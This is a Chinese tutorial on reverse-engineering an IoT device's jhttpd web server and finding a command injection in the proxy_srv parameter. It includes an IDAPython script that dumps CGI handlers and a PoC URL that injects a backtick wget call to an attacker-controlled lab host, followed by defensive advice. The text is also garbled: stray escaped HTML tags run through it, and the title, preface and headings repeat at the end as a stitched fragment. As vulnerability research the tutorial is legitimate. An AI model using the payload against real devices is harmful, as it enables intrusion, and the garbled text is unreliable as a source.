jhttpd分析与系统命令注入漏洞挖掘教学文档<\/h1>

1. 前言<\/h2>
在IoT设备中，常见的WebServer包括httpd、thttpd、Boa以及jhttpd等。对这些WebServer进行白盒审计是发现漏洞的重要途径。本文将以某设备的jhttpd为例，详细讲解从分析到漏洞挖掘及复现的全过程。<\/p>

2. jhttpd基础分析<\/h2>

2.1 主要函数结构<\/h3>

使用Ghidra逆向分析工具导入jhttpd二进制文件，从main函数开始分析：<\/p>

内存管理初始化<\/strong>：mem_init_fun()<\/code><\/li>
服务类型初始化<\/strong>：httpd_find_type2_init()<\/code><\/li>

HTTP请求处理初始化<\/strong>： httpd_file_init()<\/code><\/li> httpd_file_ext_init()<\/code><\/li> httpd_cgi_ext_init()<\/code><\/li> <\/ul> <\/li> <\/ol> 2.2 HTTP文件相关初始化<\/h3> httpd_file_init()<\/code>函数主要功能：<\/p> 初始化三个全局哈希表： gl_vfile_ext_hash<\/code>：文件扩展名哈希表<\/li> gl_file_hash<\/code>：文件哈希表<\/li> gl_cgi_ext_hash<\/code>：CGI脚本哈希表<\/li> <\/ul> <\/li> 初始化httpd_all_file<\/code>结构体，存储服务器可用文件列表<\/li> 使用do-while循环遍历处理客户端请求<\/li> <\/ul> 2.3 服务初始化<\/h3> httpd_sever_init()<\/code>函数负责：<\/p> 创建TCP套接字（IPv4）<\/li> 设置套接字为非阻塞模式（setnonblocking()<\/code>）<\/li> 设置SO_REUSEADDR选项（允许立即重用套接字）<\/li> 绑定套接字到本地地址和端口（最多重试10次）<\/li> 开始监听连接请求<\/li> 初始化轮询机制处理HTTP请求<\/li> <\/ol> 2.4 HTTP请求处理<\/h3> http_poll()<\/code>函数处理套接字事件：<\/p> 接受新连接<\/li> 读取数据<\/li> 发送数据<\/li> 关闭连接<\/li> <\/ul> 请求处理流程：<\/p> GET请求<\/strong>：调用memcmp()<\/code>比对"GET"字符串，匹配成功后调用httpd_dowith_get()<\/code><\/li> POST请求<\/strong>：调用memcmp()<\/code>比对"POST"字符串，匹配成功后调用httpd_do_wwwparm()<\/code>处理表单数据<\/li> <\/ol> 3. CGI接口分析<\/h2> 3.1 使用IDAPython提取CGI接口<\/h3> from<\/span> idaapi import<\/span> *<\/span> <\/span><\/span> <\/span><\/span>host =<\/span> "http:\/\/127.0.0.2\/"<\/span> <\/span><\/span> <\/span><\/span>def<\/span> ReadStr<\/span>(addr): <\/span><\/span> res =<\/span> ''<\/span> <\/span><\/span> while<\/span> True<\/span>: <\/span><\/span> ch =<\/span> get_byte(addr) <\/span><\/span> if<\/span> ch ==<\/span> 0<\/span>: <\/span><\/span> break<\/span> <\/span><\/span> res +=<\/span> chr(ch) <\/span><\/span> addr +=<\/span> 1<\/span> <\/span><\/span> return<\/span> res <\/span><\/span> <\/span><\/span>class<\/span> dump<\/span>(object): <\/span><\/span> def<\/span> __init__(self): <\/span><\/span> pass<\/span> <\/span><\/span> <\/span><\/span> def<\/span> http_cgi_all_fun<\/span>(self): <\/span><\/span> print("start"<\/span>) <\/span><\/span> httpd_cgi_all_fun_addr =<\/span> 0x6b0000<\/span> <\/span><\/span> cgi_name =<\/span> get_32bit(httpd_cgi_all_fun_addr +<\/span> 3<\/span> *<\/span> 4<\/span>) <\/span><\/span> while<\/span> httpd_cgi_all_fun_addr <<\/span> 0x4801000<\/span>: <\/span><\/span> cgi_name =<\/span> get_32bit(httpd_cgi_all_fun_addr +<\/span> 3<\/span> *<\/span> 4<\/span>) <\/span><\/span> if<\/span> cgi_name !=<\/span> 0<\/span>: <\/span><\/span> data =<\/span> get_bytes(httpd_cgi_all_fun_addr, 0x14<\/span>) <\/span><\/span> data =<\/span> list(struct.<\/span>unpack("<"<\/span> +<\/span> "I"<\/span>*<\/span>5<\/span>, data)) <\/span><\/span> data[3<\/span>] =<\/span> host +<\/span> ReadStr(data[3<\/span>]) <\/span><\/span> data.<\/span>append(get_ea_name(data[4<\/span>])) <\/span><\/span> data[4<\/span>] =<\/span> hex(data[4<\/span>]) <\/span><\/span> print(data) <\/span><\/span> httpd_cgi_all_fun_addr +=<\/span> 0x14<\/span> <\/span><\/span> print("end"<\/span>) <\/span><\/span> <\/span><\/span>dump_obj =<\/span> dump() <\/span><\/span>dump_obj.<\/span>http_cgi_all_fun() <\/span><\/span><\/code><\/pre>该脚本从内存中提取CGI接口信息，包括：<\/p> 接口地址<\/li> 接口名称<\/li> 处理函数地址<\/li> 映射路径<\/li> <\/ul> 4. 命令注入漏洞分析<\/h2> 4.1 漏洞函数分析<\/h3> 通过查找jhl_system()<\/code>函数调用，发现存在漏洞的函数sub_47EAE8<\/code>，其主要流程：<\/p> 从HTTP请求获取proxy_srv<\/code>参数：v14 = httpd_get_parm(a1, "proxy_srv")<\/code><\/li> 设置NVRAM值：nvram_set("proxy_srv", v14)<\/code><\/li> 构造系统命令：使用snprintf<\/code>构造proxy_client<\/code>命令<\/li> 执行命令：调用jhl_system()<\/code>执行构造的命令<\/li> <\/ol> 关键问题<\/strong>：proxy_srv<\/code>参数未经过滤直接拼接到系统命令中，导致命令注入漏洞。<\/p> 4.2 漏洞复现<\/h3> 使用FirmAE或QEMU仿真环境进行复现：<\/p> POC：<\/p> http:\/\/192.168.0.1\/proxy_client.asp?proxy_srv=111`wget%20http%3a%2f%2f192.168.0.2%3a9999%2f11`&proxy_srvport=2&proxy_srvport=1&proxy_lanip=127.0.0.1&proxy_lanport=8080&proxy_en=1 <\/code><\/pre> 验证步骤：<\/p> 在攻击机器上启动Python Web服务（监听9999端口）<\/li> 发送上述POC请求<\/li> 观察Web服务是否收到请求，验证命令是否执行<\/li> <\/ol> 5. 漏洞挖掘方法论总结<\/h2> 逆向分析流程<\/strong>：<\/p> 从main函数入手，理清程序结构<\/li> 分析HTTP请求处理流程<\/li> 识别关键函数（如命令执行函数）<\/li> <\/ul> <\/li> 漏洞挖掘技巧<\/strong>：<\/p> 查找危险函数调用（system、exec等）<\/li> 跟踪用户输入流向<\/li> 分析参数过滤情况<\/li> <\/ul> <\/li> 自动化辅助<\/strong>：<\/p> 使用IDAPython脚本提取接口信息<\/li> 批量分析危险函数调用<\/li> <\/ul> <\/li> 验证方法<\/strong>：<\/p> 搭建仿真环境（FirmAE\/QEMU）<\/li> 构造POC验证漏洞<\/li> 通过外部观察点确认漏洞存在<\/li> <\/ul> <\/li> <\/ol> 6. 防御建议<\/h2> 输入验证<\/strong>：<\/p> 对所有用户输入进行严格过滤<\/li> 使用白名单机制限制允许的字符<\/li> <\/ul> <\/li> 安全函数<\/strong>：<\/p> 避免直接使用system等危险函数<\/li> 使用execve等更安全的替代方案<\/li> <\/ul> <\/li> 权限控制<\/strong>：<\/p> Web服务以低权限运行<\/li> 限制Web服务可执行的命令<\/li> <\/ul> <\/li> 代码审计<\/strong>：<\/p> 定期进行安全审计<\/li> 重点关注用户输入与系统命令的交互点<\/li> <\/ul> <\/li> <\/ol> 通过本教学文档，读者可以掌握从IoT设备WebServer逆向分析到命令注入漏洞挖掘的完整流程，以及相关的工具使用和验证方法。<\/p>

jhttpd分析与系统命令注入漏洞挖掘教学文档<\/h1>

1. 前言<\/h2> 在IoT设备中，常见的WebServer包括httpd、thttpd、Boa以及jhttpd等。对这些WebServer进行白盒审计是发现漏洞的重要途径。本文将以某设备的jhttpd为例，详细讲解从分析到漏洞挖掘及复现的全过程。<\/p>

2. jhttpd基础分析<\/h2>

3. CGI接口分析<\/h2>

4. 命令注入漏洞分析<\/h2>

1. 前言<\/h2>
在IoT设备中，常见的WebServer包括httpd、thttpd、Boa以及jhttpd等。对这些WebServer进行白盒审计是发现漏洞的重要途径。本文将以某设备的jhttpd为例，详细讲解从分析到漏洞挖掘及复现的全过程。<\/p>